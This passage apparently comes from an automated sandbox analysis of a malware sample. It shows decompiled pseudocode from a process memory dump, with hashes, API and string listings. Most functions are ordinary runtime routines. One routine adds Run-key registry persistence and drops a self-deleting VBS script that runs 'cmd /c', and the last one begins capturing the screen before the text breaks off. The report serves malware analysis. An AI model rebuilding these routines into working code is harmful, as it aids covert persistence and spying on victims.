                										__eflags = _t100 - 0x58;
                										if(_t100 != 0x58) {
                											goto L49;
                										}
                										goto L48;
                									}
                									_t80 = _t113 >> 6;
                									__eflags = _t92 & _t80;
                									if((_t92 & _t80) == 0) {
                										__eflags = _t92 & _t113;
                										if((_t92 & _t113) == 0) {
                											_t82 = _t113 >> 1;
                											__eflags = _t92 & _t82;
                											if((_t92 & _t82) == 0) {
                												goto L46;
                											}
                											_v8 = 0x20;
                											L45:
                											_t115 = _t92;
                											goto L46;
                										}
                										_v8 = 0x2b;
                										goto L45;
                									}
                									_v8 = 0x2d;
                									goto L45;
                								}
                								_t69 = _t92;
                								goto L70;
                							}
                							L11:
                							_t69 = 0;
                							goto L70;
                						}
                						_t84 = _t50;
                						__eflags = _t84;
                						if(__eflags == 0) {
                							L28:
                							_push(0);
                							_push(0xa);
                							L29:
                							_t51 = E0043D5F2(_t119, _t114, __eflags);
                							goto L10;
                						}
                						__eflags = _t84 - 3;
                						if(__eflags != 0) {
                							goto L11;
                						}
                						_push(0);
                						L13:
                						_push(0x10);
                						goto L29;
                					}
                					if(__eflags == 0) {
                						_t51 = E0043D7CF(__ecx);
                						goto L10;
                					}
                					__eflags = _t49 - 0x67;
                					if(_t49 <= 0x67) {
                						L30:
                						_t51 = E0043D1FE(_t92, _t119, _t112);
                						goto L10;
                					}
                					__eflags = _t49 - 0x69;
                					if(_t49 == 0x69) {
                						L27:
                						_t2 = _t119 + 0x20;
                						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
                						__eflags =  *_t2;
                						goto L28;
                					}
                					__eflags = _t49 - 0x6e;
                					if(_t49 == 0x6e) {
                						_t51 = E0043D73C(__ecx, _t112);
                						goto L10;
                					}
                					__eflags = _t49 - 0x6f;
                					if(_t49 != 0x6f) {
                						goto L11;
                					}
                					_t51 = E0043D7B0(__ecx);
                					goto L10;
                				}
                				if(_t124 == 0) {
                					goto L27;
                				}
                				_t125 = _t49 - 0x58;
                				if(_t125 > 0) {
                					_t86 = _t49 - 0x5a;
                					__eflags = _t86;
                					if(_t86 == 0) {
                						_t51 = E0043D138(__ecx);
                						goto L10;
                					}
                					_t87 = _t86 - 7;
                					__eflags = _t87;
                					if(_t87 == 0) {
                						goto L30;
                					}
                					__eflags = _t87;
                					if(__eflags != 0) {
                						goto L11;
                					}
                					L17:
                					_t51 = E0043D4CA(_t92, _t119, __eflags, 0);
                					goto L10;
                				}
                				if(_t125 == 0) {
                					_push(1);
                					goto L13;
                				}
                				if(_t49 == 0x41) {
                					goto L30;
                				}
                				if(_t49 == 0x43) {
                					goto L17;
                				}
                				if(_t49 <= 0x44) {
                					goto L11;
                				}
                				if(_t49 <= 0x47) {
                					goto L30;
                				}
                				if(_t49 != 0x53) {
                					goto L11;
                				}
                				goto L9;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                • Instruction ID: 30287a3694dd43d94ab10e3d1e96423d83f960c2cd3ce907925d9f31734030c6
                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                • Instruction Fuzzy Hash: 8B514671A00A0697DB3C692884D97BF27969F0D705F18781BD882F7382C71CEE06975E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E0043C99C(intOrPtr* __ecx) {
                				char _v6;
                				char _v8;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				char _t49;
                				signed int _t50;
                				void* _t51;
                				signed char _t54;
                				signed char _t56;
                				signed int _t57;
                				signed int _t58;
                				signed char _t67;
                				signed char _t69;
                				signed char _t71;
                				signed char _t80;
                				signed char _t82;
                				signed int _t84;
                				signed int _t86;
                				signed int _t87;
                				signed char _t92;
                				void* _t95;
                				intOrPtr _t100;
                				unsigned int _t102;
                				signed char _t104;
                				void* _t112;
                				unsigned int _t113;
                				void* _t114;
                				signed int _t115;
                				signed int* _t116;
                				intOrPtr* _t119;
                				void* _t121;
                				void* _t122;
                				void* _t124;
                				void* _t125;
                
                				_push(__ecx);
                				_t119 = __ecx;
                				_t92 = 1;
                				_t49 =  *((char*)(__ecx + 0x31));
                				_t124 = _t49 - 0x64;
                				if(_t124 > 0) {
                					__eflags = _t49 - 0x70;
                					if(__eflags > 0) {
                						_t50 = _t49 - 0x73;
                						__eflags = _t50;
                						if(_t50 == 0) {
                							L9:
                							_t51 = E0043D7E7(_t119);
                							L10:
                							if(_t51 != 0) {
                								__eflags =  *((char*)(_t119 + 0x30));
                								if( *((char*)(_t119 + 0x30)) == 0) {
                									_t113 =  *(_t119 + 0x20);
                									_push(_t114);
                									_v8 = 0;
                									_t115 = 0;
                									_v6 = 0;
                									_t54 = _t113 >> 4;
                									__eflags = _t92 & _t54;
                									if((_t92 & _t54) == 0) {
                										L46:
                										_t100 =  *((intOrPtr*)(_t119 + 0x31));
                										__eflags = _t100 - 0x78;
                										if(_t100 == 0x78) {
                											L48:
                											_t56 = _t113 >> 5;
                											__eflags = _t92 & _t56;
                											if((_t92 & _t56) != 0) {
                												L50:
                												__eflags = _t100 - 0x61;
                												if(_t100 == 0x61) {
                													L53:
                													_t57 = 1;
                													L54:
                													__eflags = _t92;
                													if(_t92 != 0) {
                														L56:
                														 *((char*)(_t121 + _t115 - 4)) = 0x30;
                														__eflags = _t100 - 0x58;
                														if(_t100 == 0x58) {
                															L59:
                															_t58 = 1;
                															L60:
                															__eflags = _t58;
                															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                															_t115 = _t115 + 2;
                															__eflags = _t115;
                															L61:
                															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
                															__eflags = _t113 & 0x0000000c;
                															if((_t113 & 0x0000000c) == 0) {
                																E0043B3DE(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
                																_t122 = _t122 + 0x10;
                															}
                															E0043DE52(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
                															_t102 =  *(_t119 + 0x20);
                															_t116 = _t119 + 0x18;
                															_t67 = _t102 >> 3;
                															__eflags = _t67 & 0x00000001;
                															if((_t67 & 0x00000001) != 0) {
                																_t104 = _t102 >> 2;
                																__eflags = _t104 & 0x00000001;
                																if((_t104 & 0x00000001) == 0) {
                																	E0043B3DE(_t119 + 0x448, 0x30, _t95, _t116);
                																	_t122 = _t122 + 0x10;
                																}
                															}
                															E0043DB7E(_t95, _t119, _t116, _t119, 0);
                															__eflags =  *_t116;
                															if( *_t116 >= 0) {
                																_t71 =  *(_t119 + 0x20) >> 2;
                																__eflags = _t71 & 0x00000001;
                																if((_t71 & 0x00000001) != 0) {
                																	E0043B3DE(_t119 + 0x448, 0x20, _t95, _t116);
                																}
                															}
                															_t69 = 1;
                															L70:
                															return _t69;
                														}
                														__eflags = _t100 - 0x41;
                														if(_t100 == 0x41) {
                															goto L59;
                														}
                														_t58 = 0;
                														goto L60;
                													}
                													__eflags = _t57;
                													if(_t57 == 0) {
                														goto L61;
                													}
                													goto L56;
                												}
                												__eflags = _t100 - 0x41;
                												if(_t100 == 0x41) {
                													goto L53;
                												}
                												_t57 = 0;
                												goto L54;
                											}
                											L49:
                											_t92 = 0;
                											__eflags = 0;
                											goto L50;
                										}
                										__eflags = _t100 - 0x58;
                										if(_t100 != 0x58) {
                											goto L49;
                										}
                										goto L48;
                									}
                									_t80 = _t113 >> 6;
                									__eflags = _t92 & _t80;
                									if((_t92 & _t80) == 0) {
                										__eflags = _t92 & _t113;
                										if((_t92 & _t113) == 0) {
                											_t82 = _t113 >> 1;
                											__eflags = _t92 & _t82;
                											if((_t92 & _t82) == 0) {
                												goto L46;
                											}
                											_v8 = 0x20;
                											L45:
                											_t115 = _t92;
                											goto L46;
                										}
                										_v8 = 0x2b;
                										goto L45;
                									}
                									_v8 = 0x2d;
                									goto L45;
                								}
                								_t69 = _t92;
                								goto L70;
                							}
                							L11:
                							_t69 = 0;
                							goto L70;
                						}
                						_t84 = _t50;
                						__eflags = _t84;
                						if(__eflags == 0) {
                							L28:
                							_push(0);
                							_push(0xa);
                							L29:
                							_t51 = E0043D5F2(_t119, _t114, __eflags);
                							goto L10;
                						}
                						__eflags = _t84 - 3;
                						if(__eflags != 0) {
                							goto L11;
                						}
                						_push(0);
                						L13:
                						_push(0x10);
                						goto L29;
                					}
                					if(__eflags == 0) {
                						_t51 = E0043D7CF(__ecx);
                						goto L10;
                					}
                					__eflags = _t49 - 0x67;
                					if(_t49 <= 0x67) {
                						L30:
                						_t51 = E0043D1FE(_t92, _t119, _t112);
                						goto L10;
                					}
                					__eflags = _t49 - 0x69;
                					if(_t49 == 0x69) {
                						L27:
                						_t2 = _t119 + 0x20;
                						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
                						__eflags =  *_t2;
                						goto L28;
                					}
                					__eflags = _t49 - 0x6e;
                					if(_t49 == 0x6e) {
                						_t51 = E0043D73C(__ecx, _t112);
                						goto L10;
                					}
                					__eflags = _t49 - 0x6f;
                					if(_t49 != 0x6f) {
                						goto L11;
                					}
                					_t51 = E0043D7B0(__ecx);
                					goto L10;
                				}
                				if(_t124 == 0) {
                					goto L27;
                				}
                				_t125 = _t49 - 0x58;
                				if(_t125 > 0) {
                					_t86 = _t49 - 0x5a;
                					__eflags = _t86;
                					if(_t86 == 0) {
                						_t51 = E0043D138(__ecx);
                						goto L10;
                					}
                					_t87 = _t86 - 7;
                					__eflags = _t87;
                					if(_t87 == 0) {
                						goto L30;
                					}
                					__eflags = _t87;
                					if(__eflags != 0) {
                						goto L11;
                					}
                					L17:
                					_t51 = E0043D4CA(_t92, _t119, __eflags, 0);
                					goto L10;
                				}
                				if(_t125 == 0) {
                					_push(1);
                					goto L13;
                				}
                				if(_t49 == 0x41) {
                					goto L30;
                				}
                				if(_t49 == 0x43) {
                					goto L17;
                				}
                				if(_t49 <= 0x44) {
                					goto L11;
                				}
                				if(_t49 <= 0x47) {
                					goto L30;
                				}
                				if(_t49 != 0x53) {
                					goto L11;
                				}
                				goto L9;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                • Instruction ID: a46682f6029e755382b5c6ad5a816cfbc1239a22f9056b24f3916154809a18ad
                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                • Instruction Fuzzy Hash: A25146A160064897DF34DA6894D77BF67899F1E304F18350BE582F7382C61DAD46C39E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E004264BA(void* __ecx, void* __edx, signed int _a4, void* _a8, signed int _a12, void* _a16, int _a20) {
                				char _v16;
                				signed int _v20;
                				signed int _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v48;
                				void* __edi;
                				void* _t100;
                				void* _t143;
                				void* _t144;
                				signed int* _t152;
                				signed int _t187;
                				signed int _t190;
                				unsigned int _t192;
                				unsigned int _t194;
                				signed int _t195;
                				signed int _t198;
                				signed int* _t199;
                
                				_t199 =  &_v48;
                				asm("xorps xmm0, xmm0");
                				asm("movlpd [esp+0x18], xmm0");
                				_t143 = __edx;
                				asm("movlpd [esp+0x24], xmm0");
                				E004351E0( &_v16, __ecx + 0x124, 0x10);
                				E00425661( &_v16,  &_v16);
                				_t195 = _a4;
                				_t100 = 0;
                				if(_t195 == 0 || _t143 == 0) {
                					L7:
                					_t187 = _a12;
                					if(_t187 == 0) {
                						L14:
                						_v36 = _v36 ^ (0 << 0x00000020 | _t187) << 0x3;
                						_t152 =  &_v48;
                						_v44 = _v44 ^ (0 << 0x00000020 | _t195) << 0x3;
                						_v48 = _v48 ^ _t195 << 0x00000003;
                						_v40 = _v40 ^ _t187 << 0x00000003;
                						E00426351(_t152,  &_v16);
                						_push(_t152);
                						E00425661( &_v48,  &_v48);
                						return E004351E0(_a16,  &_v48, _a20);
                					}
                					_t144 = _a8;
                					if(_t144 == 0) {
                						goto L14;
                					}
                					_t192 = _t187 >> 4;
                					_t198 = _t187 & 0x0000000f;
                					if(_t192 == 0) {
                						L11:
                						if(_t198 != 0) {
                							E00435760(_t187,  &_v32, 0, 0x10);
                							_t199 =  &(_t199[3]);
                							E004351E0( &_v32, _t144, _t198);
                							E00425661( &_v32,  &_v32);
                							_v48 = _v48 ^ _v32;
                							_v44 = _v44 ^ _v28;
                							_v40 = _v40 ^ _v24;
                							_v36 = _v36 ^ _v20;
                							E00426351( &_v48,  &_v16);
                						}
                						_t195 = _a4;
                						goto L14;
                					} else {
                						goto L10;
                					}
                					do {
                						L10:
                						E004351E0( &_v32, _t144, 0x10);
                						E00425661( &_v32,  &_v32);
                						_v48 = _v48 ^ _v32;
                						_v44 = _v44 ^ _v28;
                						_v40 = _v40 ^ _v24;
                						_v36 = _v36 ^ _v20;
                						E00426351( &_v48,  &_v16);
                						_t144 = _t144 + 0x10;
                						_t192 = _t192 - 1;
                					} while (_t192 != 0);
                					goto L11;
                				} else {
                					_t194 = _t195 >> 4;
                					_t190 = _t195 & 0x0000000f;
                					if(_t194 == 0) {
                						L5:
                						if(_t190 != 0) {
                							E00435760(_t190,  &_v32, _t100, 0x10);
                							_t199 =  &(_t199[3]);
                							E004351E0( &_v32, _t143, _t190);
                							E00425661( &_v32,  &_v32);
                							_v48 = _v48 ^ _v32;
                							_v44 = _v44 ^ _v28;
                							_v40 = _v40 ^ _v24;
                							_v36 = _v36 ^ _v20;
                							E00426351( &_v48,  &_v16);
                						}
                						goto L7;
                					} else {
                						goto L3;
                					}
                					do {
                						L3:
                						E004351E0( &_v32, _t143, 0x10);
                						E00425661( &_v32,  &_v32);
                						_v48 = _v48 ^ _v32;
                						_v44 = _v44 ^ _v28;
                						_v40 = _v40 ^ _v24;
                						_v36 = _v36 ^ _v20;
                						E00426351( &_v48,  &_v16);
                						_t143 = _t143 + 0x10;
                						_t194 = _t194 - 1;
                					} while (_t194 != 0);
                					_t100 = 0;
                					goto L5;
                				}
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cb81251cb37eaa5e7aedacf1641149857d5b75f668e0732117be4287fcbc85c1
                • Instruction ID: a0b72adf9ff0cefad75c2eb729c64b02d8178a57de1e5a50e5e4da2a9e9bd651
                • Opcode Fuzzy Hash: cb81251cb37eaa5e7aedacf1641149857d5b75f668e0732117be4287fcbc85c1
                • Instruction Fuzzy Hash: 59615C32A083159FC304DF35E581A5FB7E5AFCC758F850E2EF49996151EB34EA088B86
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00437040(signed int _a4, signed char _a8, intOrPtr _a12) {
                				intOrPtr _t13;
                				void* _t14;
                				signed char _t20;
                				signed char _t24;
                				signed int _t27;
                				signed char _t32;
                				unsigned int _t33;
                				signed char _t35;
                				signed char _t37;
                				signed int _t39;
                
                				_t13 = _a12;
                				if(_t13 == 0) {
                					L11:
                					return _t13;
                				} else {
                					_t39 = _a4;
                					_t20 = _a8;
                					if((_t39 & 0x00000003) == 0) {
                						L5:
                						_t14 = _t13 - 4;
                						if(_t14 < 0) {
                							L8:
                							_t13 = _t14 + 4;
                							if(_t13 == 0) {
                								goto L11;
                							} else {
                								while(1) {
                									_t24 =  *_t39;
                									_t39 = _t39 + 1;
                									if((_t24 ^ _t20) == 0) {
                										goto L20;
                									}
                									_t13 = _t13 - 1;
                									if(_t13 != 0) {
                										continue;
                									} else {
                										goto L11;
                									}
                									goto L24;
                								}
                								goto L20;
                							}
                						} else {
                							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
                							do {
                								_t27 =  *_t39 ^ _t20;
                								_t39 = _t39 + 4;
                								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
                									goto L12;
                								} else {
                									_t8 = _t39 - 4; // 0xe82c244c
                									_t32 =  *_t8 ^ _t20;
                									if(_t32 == 0) {
                										_t12 = _t39 - 4; // 0x40c79f
                										return _t12;
                									} else {
                										_t33 = _t32 ^ _t20;
                										if(_t33 == 0) {
                											_t11 = _t39 - 3; // 0x40c7a0
                											return _t11;
                										} else {
                											_t35 = _t33 >> 0x00000010 ^ _t20;
                											if(_t35 == 0) {
                												_t10 = _t39 - 2; // 0x40c7a1
                												return _t10;
                											} else {
                												if((_t35 ^ _t20) == 0) {
                													goto L20;
                												} else {
                													goto L12;
                												}
                											}
                										}
                									}
                								}
                								goto L24;
                								L12:
                								_t14 = _t14 - 4;
                							} while (_t14 >= 0);
                							goto L8;
                						}
                					} else {
                						while(1) {
                							_t37 =  *_t39;
                							_t39 = _t39 + 1;
                							if((_t37 ^ _t20) == 0) {
                								break;
                							}
                							_t13 = _t13 - 1;
                							if(_t13 == 0) {
                								goto L11;
                							} else {
                								if((_t39 & 0x00000003) != 0) {
                									continue;
                								} else {
                									goto L5;
                								}
                							}
                							goto L24;
                						}
                						L20:
                						_t9 = _t39 - 1; // 0x40c7a2
                						return _t9;
                					}
                				}
                				L24:
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction ID: 94b43a901a8d8a49cd71d2bcfdbca38c3b4e94e2fd8866408c7f20fc8d0dab54
                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction Fuzzy Hash: 8C110BF724818143D63C8A3DC4B86B7A3B5EBCE321F2CA37BD1C14B754D12B95459908
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E0040C929(void* __edx, void* _a4) {
                				char _v0;
                				short _v524;
                				char _v548;
                				void* _v560;
                				char _v576;
                				void* _v584;
                				char _v596;
                				char _v600;
                				char _v612;
                				char _v620;
                				char _v624;
                				char _v628;
                				void* _v632;
                				char _v644;
                				char _v648;
                				char _v652;
                				void* _v656;
                				char _v668;
                				char _v672;
                				char _v676;
                				void* _v680;
                				char _v692;
                				void* _v696;
                				char _v700;
                				char _v704;
                				char _v708;
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				void* _t53;
                				void* _t54;
                				void* _t57;
                				signed int _t61;
                				void* _t62;
                				void* _t67;
                				void* _t78;
                				void* _t79;
                				void* _t92;
                				void* _t93;
                				signed char _t134;
                				void* _t213;
                				void* _t244;
                				void* _t246;
                				void* _t247;
                				void* _t248;
                
                				_t213 = __edx;
                				E00411D93();
                				if( *0x46f9d4 != 0x30) {
                					E0040AE1C();
                				}
                				_t244 =  *0x470d63 - 1; // 0x0
                				if(_t244 == 0) {
                					E004185EF(_t213, _t244);
                				}
                				if( *0x470a85 != 0) {
                					E0041AC0A(E00401EE4(0x472d40), _t213);
                				}
                				_t230 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                				_t246 =  *0x470b33 - 1; // 0x1
                				if(_t246 == 0) {
                					E00412D0B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EE4(0x473208));
                				}
                				_t247 =  *0x470b30 - 1; // 0x1
                				if(_t247 == 0) {
                					E00412D0B(0x80000002, _t230, E00401EE4(0x473208));
                				}
                				_t248 =  *0x470b31 - 1; // 0x0
                				if(_t248 == 0) {
                					E00412D0B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EE4(0x473208));
                				}
                				_t53 = E0040245C();
                				_t54 = E00401F8B(0x473280);
                				_t57 = E004129E0(E00401F8B(0x473238), "exepath",  &_v524, 0x208, _t54, _t53);
                				_t249 = _t57;
                				if(_t57 == 0) {
                					GetModuleFileNameW(0,  &_v524, 0x208);
                				}
                				RegDeleteKeyA(0x80000001, E00401F8B(0x473238));
                				_t61 = SetFileAttributesW( &_v524, 0x80);
                				_t140 = 0x473250;
                				asm("sbb bl, bl");
                				_t134 =  ~_t61 & 0x00000001;
                				_t62 = E00406E2B(_t249);
                				_t250 = _t62;
                				if(_t62 != 0) {
                					_t140 = 0x473250;
                					SetFileAttributesW(E00401EE4(0x473250), 0x80);
                				}
                				E00402FF4(_t134,  &_v600, E0040415E(_t134,  &_v668, 0x46a8f0, 0x46a8f0, E0043A99F(_t134, _t140, _t250, L"Temp")), 0, 0x46a8f0, _t250, L"\\update.vbs");
                				E00401EE9();
                				_t67 = E0040415E(_t134,  &_v672, _t64, 0x46a8f0, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                				_t217 = L"On Error Resume Next\n";
                				E004042DC(_t134,  &_v700, L"On Error Resume Next\n", 0x46a8f0, _t250, _t67);
                				E00401EE9();
                				_t251 = _t134;
                				if(_t134 != 0) {
                					_t217 = E004042DC(_t134,  &_v648, L"while fso.FileExists(\"", 0x46a8f0, _t251, E0040415E(_t134,  &_v620, L"On Error Resume Next\n", 0x46a8f0,  &_v524));
                					E0040323D(E00402FF4(_t134,  &_v672, _t109, 0, 0x46a8f0, _t251, L"\")\n"));
                					E00401EE9();
                					E00401EE9();
                					E00401EE9();
                				}
                				_t236 = L"\"\n";
                				E0040323D(E00402FF4(_t134,  &_v624, E00402FF4(_t134,  &_v648, E0040415E(_t134,  &_v668, _t217, 0x46a8f0, L"fso.DeleteFile \""), 0, 0x46a8f0, _t251,  &_v524), 0, 0x46a8f0, _t251, L"\"\n"));
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				_t252 = _t134;
                				if(_t134 != 0) {
                					_t26 =  &_v692; // 0x465028
                					L004086C6(_t134, _t26, 0, 0x46a8f0, L"wend\n");
                				}
                				_t220 = 0x46a8f0;
                				_t78 = E00406E2B(_t252);
                				_t253 = _t78;
                				if(_t78 != 0) {
                					_t220 = E0040AEF6( &_v644, L"fso.DeleteFolder \"", 0x46a8f0, 0x473250);
                					E0040323D(E00402FF4(0x473250,  &_v620, _t101, 0, 0x46a8f0, _t253, _t236));
                					E00401EE9();
                					E00401EE9();
                				}
                				_t79 = E0040415E(0x473250,  &_v548, _t220, 0x46a8f0, L"\"\"\", 0");
                				E0040323D(E00402FF4(0x473250,  &_v628, E00402F85( &_v652, E004042FD(0x473250,  &_v676, E0040415E(0x473250,  &_v576, _t220, 0x46a8f0, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0x46a8f0, _t253,  &_v0), _t79), 0, 0x46a8f0, _t253, "\n"));
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				E00401EE9();
                				L004086C6(0x473250,  &_v704, 0, 0x46a8f0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                				_t92 = E00401EE4( &_v612);
                				_t93 = E0040245C();
                				E00401EE4( &_v708);
                				if(E0041AD6A(_t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EE4( &_v596), 0x46a8f0, 0x46a8f0, 0) > 0x20) {
                					ExitProcess(0);
                				}
                				E00401EE9();
                				E00401EE9();
                				return E00401EE9();
                			}

                APIs
                  • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                  • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040CA21
                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040CA34
                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040CA4D
                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040CA7D
                  • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                  • Part of subcall function 0040AE1C: UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                  • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                  • Part of subcall function 0041AD6A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0046A8F0,00000000,00000000,0040C902,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041ADA9
                • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040CCC8
                • ExitProcess.KERNEL32 ref: 0040CCD4
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                • String ID: """, 0$")$(PF$82G$@-G$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$P2G$P2G$P2G$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                • API String ID: 1861856835-3214438867
                • Opcode ID: e5b14d50524fe983c0e4c764485e8c2e775e618c7544e191d2b79e7aec53253f
                • Instruction ID: f36577c89e8dd83dec34a85844eba9d7716d9325f3a0deb710764ed536580f15
                • Opcode Fuzzy Hash: e5b14d50524fe983c0e4c764485e8c2e775e618c7544e191d2b79e7aec53253f
                • Instruction Fuzzy Hash: 059182712042405BC718FB62D892AEF77E99F90308F10453FF546A71E2EE789D49C69E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00417A23(void* __ecx, int __edx, void* __eflags) {
                				signed int _v16;
                				struct _ICONINFO _v132;
                				signed int _v146;
                				signed int _v148;
                				char _v149;
                				char _v152;
                				signed int _v156;
                				signed int _v160;
                				void* _v164;
                				struct HICON__* _v168;
                				char _v172;
                				int _v176;
                				int _v180;
                				int _v188;
                				int _v196;
                				intOrPtr _v224;
                				void* _v228;
                				char _v233;
                				char _v236;
                				struct HDC__* _v240;
                				intOrPtr _v242;
                				void* _v244;
                				intOrPtr _v246;
                				char _v248;
                				intOrPtr _v250;
                				signed int _v252;
                				char _v256;
                				char _v260;
                				struct HDC__* _v268;
                				void* _v284;
                				void* _v296;
                				struct HDC__* _v308;
                				void* __ebx;
                				void* __ebp;
                				int _t104;
                				void* _t111;
                				void* _t113;
                				int _t118;
                				void* _t119;
                				signed int _t122;
                				signed char _t131;
                				long _t137;
                				void* _t138;
                				void* _t177;
                				void* _t179;
                				void* _t185;
                				void* _t195;
                				signed int _t214;
                				int _t218;
                				void* _t219;
                				struct HDC__* _t223;
                				struct tagBITMAPINFO* _t225;
                				void* _t226;
                				int _t232;
                				struct HDC__* _t234;
                
                				_t215 = __edx;
                				_v149 = __edx;
                				_t185 = __ecx;
                				_t223 = CreateDCA("DISPLAY", 0, 0, 0);
                				_v160 = _t223;
                				_t234 = CreateCompatibleDC(_t223);
                				_t104 = E00417E84(_v16);
                				_v176 = _t104;
                				_t218 = _t215;
                				_v168 = _t218;
                				if(_t104 == 0 || _t218 == 0) {
                					_t104 = E00417EC6( *((intOrPtr*)((_v16 << 4) + 0x4726b0)));
                					_t218 = _t215;
                					_v176 = _t104;
                					_v168 = _t218;
                				}
                				if(_t104 == 0 || _t218 == 0) {
                					L8:
                					E00402073(_t185, _t185, _t215, _t234, 0x464074);
                					goto L9;
                				} else {
                					_t215 =  &_v160;
                					_v160 = _v160 & 0x00000000;
                					_v156 = _v156 & 0x00000000;
                					E00417EFC( *((intOrPtr*)((_v16 << 4) + 0x4726b0)),  &_v160);
                					_t219 = CreateCompatibleBitmap(_t223, _v176, _t218);
                					_v164 = _t219;
                					if(_t219 != 0) {
                						_t111 = SelectObject(_t234, _t219);
                						__eflags = _t111;
                						if(_t111 != 0) {
                							_t113 = StretchBlt(_t234, 0, 0, _v196, _v188, _t223, _v180, _v176, _v196, _v188, 0xcc0020);
                							__eflags = _t113;
                							if(_t113 == 0) {
                								goto L11;
                							}
                							__eflags = _v233;
                							if(_v233 != 0) {
                								_v172 = 0x14;
                								_t177 =  *0x4736e4( &_v172);
                								__eflags = _t177;
                								if(_t177 != 0) {
                									_t179 = GetIconInfo(_v168,  &_v132);
